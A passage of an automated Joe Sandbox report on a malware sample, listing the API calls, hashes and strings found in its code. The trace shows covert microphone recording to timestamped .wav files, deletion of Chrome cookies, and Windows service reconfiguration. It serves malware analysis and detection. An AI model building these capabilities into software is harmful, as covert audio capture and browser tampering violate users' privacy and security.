                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                • String ID:
                                • API String ID: 1324828854-0
                                • Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                • Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
                                • Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                • Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: $-E$$-E
                                • API String ID: 269201875-3140958853
                                • Opcode ID: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
                                • Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
                                • Opcode Fuzzy Hash: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
                                • Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A
                                APIs
                                • _strftime.LIBCMT ref: 00401D30
                                  • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                • waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
                                • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
                                • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                • String ID: %Y-%m-%d %H.%M$.wav
                                • API String ID: 3809562944-3597965672
                                • Opcode ID: 5a7c6690862a3c12eec0f1c385f38fa44ed12cb14a4004433c4f1684d5e2403e
                                • Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
                                • Opcode Fuzzy Hash: 5a7c6690862a3c12eec0f1c385f38fa44ed12cb14a4004433c4f1684d5e2403e
                                • Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
                                • Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
                                • Opcode Fuzzy Hash: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
                                • Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269
                                APIs
                                  • Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A
                                • _free.LIBCMT ref: 0044E128
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 0044E133
                                • _free.LIBCMT ref: 0044E13E
                                • _free.LIBCMT ref: 0044E192
                                • _free.LIBCMT ref: 0044E19D
                                • _free.LIBCMT ref: 0044E1A8
                                • _free.LIBCMT ref: 0044E1B3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                • Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
                                • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                • Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654
                                APIs
                                • GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
                                • SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                • Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
                                • Opcode Fuzzy Hash: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                • Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C
                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
                                • GetLastError.KERNEL32 ref: 0040AA28
                                Strings
                                • UserProfile, xrefs: 0040A9EE
                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
                                • [Chrome Cookies found, cleared!], xrefs: 0040AA4E
                                • [Chrome Cookies not found], xrefs: 0040AA42
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                • API String ID: 2018770650-304995407
                                • Opcode ID: 0a61cd6b6495849643311647e231b500c121e93944a07ca1c82b24e95f3714a3
                                • Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
                                • Opcode Fuzzy Hash: 0a61cd6b6495849643311647e231b500c121e93944a07ca1c82b24e95f3714a3
                                • Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F
                                APIs
                                • __allrem.LIBCMT ref: 00438A09
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
                                • __allrem.LIBCMT ref: 00438A3C
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
                                • __allrem.LIBCMT ref: 00438A71
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1992179935-0
                                • Opcode ID: a5bb698a37765ca5ad947defe33ca2ea1dc364bfd829a3e03f22b831f39bfe5b
                                • Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
                                • Opcode Fuzzy Hash: a5bb698a37765ca5ad947defe33ca2ea1dc364bfd829a3e03f22b831f39bfe5b
                                • Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: __cftoe
                                • String ID:
                                • API String ID: 4189289331-0
                                • Opcode ID: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                                • Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
                                • Opcode Fuzzy Hash: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                                • Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: __freea$__alloca_probe_16_free
                                • String ID: a/p$am/pm
                                • API String ID: 2936374016-3206640213
                                • Opcode ID: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                                • Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
                                • Opcode Fuzzy Hash: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                                • Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
                                • int.LIBCPMT ref: 0040F8D7
                                  • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                  • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                • std::_Facet_Register.LIBCPMT ref: 0040F917
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
                                • __Init_thread_footer.LIBCMT ref: 0040F97F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                • String ID:
                                • API String ID: 3815856325-0
                                • Opcode ID: d4cae47439a6db20e6e842395f89b118dcd2d5e72d0233f265971a350c60e72c
                                • Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
                                • Opcode Fuzzy Hash: d4cae47439a6db20e6e842395f89b118dcd2d5e72d0233f265971a350c60e72c
                                • Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                • String ID:
                                • API String ID: 493672254-0
                                • Opcode ID: a76e1c7468ac1a528a5f09f4ab7ed87539506fcae765116f19c1494b4087f4ac
                                • Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
                                • Opcode Fuzzy Hash: a76e1c7468ac1a528a5f09f4ab7ed87539506fcae765116f19c1494b4087f4ac
                                • Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9
                                APIs
                                • GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                • _free.LIBCMT ref: 0044575C
                                • _free.LIBCMT ref: 00445784
                                • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                • _abort.LIBCMT ref: 004457A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free$_abort
                                • String ID:
                                • API String ID: 3160817290-0
                                • Opcode ID: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                                • Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
                                • Opcode Fuzzy Hash: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                                • Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: fb4f283fb97628e5c831a0fb91a0bfb55e48429e11adbc6b559d9ac287613174
                                • Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
                                • Opcode Fuzzy Hash: fb4f283fb97628e5c831a0fb91a0bfb55e48429e11adbc6b559d9ac287613174
                                • Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: c741640427e0191265b1ffb81d3cd69f3151aa6d5418963c48d2b2230fc0099d
                                • Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
                                • Opcode Fuzzy Hash: c741640427e0191265b1ffb81d3cd69f3151aa6d5418963c48d2b2230fc0099d
                                • Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: d9582a11252cb8aea95f29102ce9ca99f1958b3c019a8481d53cf686773dbfa0
                                • Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
                                • Opcode Fuzzy Hash: d9582a11252cb8aea95f29102ce9ca99f1958b3c019a8481d53cf686773dbfa0
                                • Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 0040189E
                                • ExitThread.KERNEL32 ref: 004018D6
                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4
                                  • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
